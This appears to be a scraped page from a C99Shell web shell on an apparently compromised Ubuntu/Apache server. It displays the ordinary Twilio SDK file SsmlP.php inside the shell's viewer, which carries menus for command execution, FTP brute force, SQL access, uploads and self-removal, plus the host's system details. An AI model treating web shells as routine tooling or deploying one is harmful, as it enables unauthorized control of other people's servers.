!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache/2.4.41 (Ubuntu). PHP/8.0.30 

uname -a: Linux apirnd 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/var/www/html/main_file/vendor/twilio/sdk/src/Twilio/TwiML/Voice/   drwxr-xr-x
Free 12.97 GB of 57.97 GB (22.38%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     SsmlP.php (3.04 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

/**
 * This code was generated by
 * \ / _    _  _|   _  _
 * | (_)\/(_)(_|\/| |(/_  v1.0.0
 * /       /
 */

namespace Twilio\TwiML\Voice;

use 
Twilio\TwiML\TwiML;

class 
SsmlP extends TwiML {
    
/**
     * SsmlP constructor.
     *
     * @param string $words Words to speak
     */
    
public function __construct($words) {
        
parent::__construct('p'$words);
    }

    
/**
     * Add Break child.
     *
     * @param array $attributes Optional attributes
     * @return SsmlBreak Child element.
     */
    
public function break_($attributes = []): SsmlBreak {
        return 
$this->nest(new SsmlBreak($attributes));
    }

    
/**
     * Add Emphasis child.
     *
     * @param string $words Words to emphasize
     * @param array $attributes Optional attributes
     * @return SsmlEmphasis Child element.
     */
    
public function emphasis($words$attributes = []): SsmlEmphasis {
        return 
$this->nest(new SsmlEmphasis($words$attributes));
    }

    
/**
     * Add Lang child.
     *
     * @param string $words Words to speak
     * @param array $attributes Optional attributes
     * @return SsmlLang Child element.
     */
    
public function lang($words$attributes = []): SsmlLang {
        return 
$this->nest(new SsmlLang($words$attributes));
    }

    
/**
     * Add Phoneme child.
     *
     * @param string $words Words to speak
     * @param array $attributes Optional attributes
     * @return SsmlPhoneme Child element.
     */
    
public function phoneme($words$attributes = []): SsmlPhoneme {
        return 
$this->nest(new SsmlPhoneme($words$attributes));
    }

    
/**
     * Add Prosody child.
     *
     * @param string $words Words to speak
     * @param array $attributes Optional attributes
     * @return SsmlProsody Child element.
     */
    
public function prosody($words$attributes = []): SsmlProsody {
        return 
$this->nest(new SsmlProsody($words$attributes));
    }

    
/**
     * Add S child.
     *
     * @param string $words Words to speak
     * @return SsmlS Child element.
     */
    
public function s($words): SsmlS {
        return 
$this->nest(new SsmlS($words));
    }

    
/**
     * Add Say-As child.
     *
     * @param string $words Words to be interpreted
     * @param array $attributes Optional attributes
     * @return SsmlSayAs Child element.
     */
    
public function say_As($words$attributes = []): SsmlSayAs {
        return 
$this->nest(new SsmlSayAs($words$attributes));
    }

    
/**
     * Add Sub child.
     *
     * @param string $words Words to be substituted
     * @param array $attributes Optional attributes
     * @return SsmlSub Child element.
     */
    
public function sub($words$attributes = []): SsmlSub {
        return 
$this->nest(new SsmlSub($words$attributes));
    }

    
/**
     * Add W child.
     *
     * @param string $words Words to speak
     * @param array $attributes Optional attributes
     * @return SsmlW Child element.
     */
    
public function w($words$attributes = []): SsmlW {
        return 
$this->nest(new SsmlW($words$attributes));
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0063 ]--